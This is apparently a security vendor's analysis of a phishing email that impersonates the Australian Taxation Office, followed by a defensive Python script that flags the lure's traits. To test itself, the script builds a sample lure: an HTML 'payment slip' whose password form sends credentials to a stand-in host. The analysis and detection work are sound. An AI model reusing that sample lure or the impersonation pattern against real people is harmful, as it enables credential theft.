Abnormal Intelligence

Credential Phishing

Australian Tax Office Impersonated in Funds Transfer-themed Phishing Attack

This attack impersonates the Australian Taxation Office with a payment transfer theme and asks the recipient to validate their identity by leading them to a phishing page contained within an HTML attachment.

October 31, 2022

Impersonating the Australian Taxation Office, this attack informs the email recipient that they have received a new funds transfer and advises them that the payment is currently on hold pending identity verification. Attached to the email is a supposed payment slip with additional details about the payment. The email was sent from a maliciously registered domain, with a Gmail reply-to address. At the bottom of the email, the Australian Government Tax Office logo reinforces the theme and makes the phishing email appear more legitimate.

[Image: Ato phish 1]

When a recipient opens the referenced attachment, they are presented with a Microsoft phishing page that has pre-populated their email address and states that their password needs to be verified “because you’re accessing sensitive info.”

[Image: Ato phish 2]

Why It Bypassed Traditional Security

The URL found within the HTML attachment had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. The email's reply-to address is a Gmail account, a free webmail service available to anyone. As a result, there is no bad domain reputation for traditional security providers to discover, and the email passes all authentication checks for SPF, DKIM, and DMARC.

Detecting the Attack

HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. In addition to understanding the intent of the link, a cloud email security platform analyzes the content of the email to determine whether it is malicious.
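The traits described above (an HTML attachment carrying the credential form, a URL inside that attachment rather than the message body, the recipient's address pre-populated in the page, and a free-webmail Reply-To that does not match the sender domain) can be checked mechanically during triage. The script below is an added example and is not Abnormal's detection logic or code from the page; it uses Python's standard `email` library, and the sample message, its domains and filename are constructed for illustration.

```python
"""Triage an .eml for the traits of the ATO-themed lure described on this page.

Added example, not the vendor's detection logic. All domains, addresses and
the attachment name are constructed sample values, not real indicators.
"""
import json
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr
from urllib.parse import unquote

# Free webmail providers an attacker can use for a throwaway Reply-To.
FREE_WEBMAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
PASSWORD_FIELD_RE = re.compile(r"type\s*=\s*[\"']?password", re.IGNORECASE)


def build_sample_eml() -> bytes:
    """Constructed sample modelled on the lure; every domain here is hypothetical."""
    msg = EmailMessage()
    msg["From"] = "ATO Payments <notifications@ato-payments.example>"
    msg["Reply-To"] = "ato.refunds@gmail.com"  # free webmail, unlike the sender domain
    msg["To"] = "employee@victim.example"
    msg["Subject"] = "Funds transfer on hold - identity verification required"
    msg.set_content("Your payment is on hold pending identity verification.\n"
                    "Open the attached payment slip for details.\n")
    # The "payment slip" is an HTML file that hosts the login form itself and
    # pre-fills the recipient's address, so no URL appears in the mail body.
    html = "\n".join([
        "<html><body>",
        "<form action='https://verify-login.example/auth?user=employee%40victim.example'>",
        "<input name='password' type='password'>",
        "</form>",
        "<script>location='https://verify-login.example/auth'</script>",
        "</body></html>",
    ])
    msg.add_attachment(html, subtype="html", filename="payment_slip.html")
    return msg.as_bytes()


def _domain(header_value) -> str:
    """Return the lower-cased domain of an address header, or '' if absent."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyze(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message and report the lure's traits as findings."""
    msg = message_from_bytes(raw, policy=policy.default)
    from_domain = _domain(msg.get("From"))
    reply_domain = _domain(msg.get("Reply-To"))
    _, recipient = parseaddr(msg.get("To") or "")

    findings = set()
    if reply_domain and reply_domain != from_domain:
        findings.add("reply_to_domain_mismatch")
    if reply_domain in FREE_WEBMAIL:
        findings.add("reply_to_free_webmail")

    attachments, urls = [], set()
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        attachments.append(part.get_filename())
        body = part.get_content()
        found = URL_RE.findall(body)
        urls.update(found)
        if found:
            findings.add("html_attachment_with_urls")
        if PASSWORD_FIELD_RE.search(body):
            findings.add("html_attachment_password_field")
        # Pre-populated victim address: decode %40 etc. before comparing.
        if recipient and recipient.lower() in unquote(body).lower():
            findings.add("recipient_prepopulated")

    return {
        "from_domain": from_domain,
        "reply_to_domain": reply_domain,
        "html_attachments": attachments,
        "urls": sorted(urls),          # feed these to URL reputation / sandboxing
        "findings": sorted(findings),
        "suspicious": bool(findings),
    }


if __name__ == "__main__":
    print(json.dumps(analyze(build_sample_eml()), indent=2))
```

The URLs are extracted from the attachment rather than the message body, which is exactly where a body-only link scanner misses them; the findings list is intended as enrichment for a mail gateway or SIEM rule, not as a verdict on its own, since a legitimate HTML attachment can contain links and a Reply-To mismatch alone is common with ticketing systems.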

Risk to Organization

As soon as an employee enters their credentials, attackers have access to their email accounts, which can be used to gather sensitive information or to launch attacks on coworkers, customers, or vendors.

Classification

Credential Phishing
Payload-based
Credential Theft
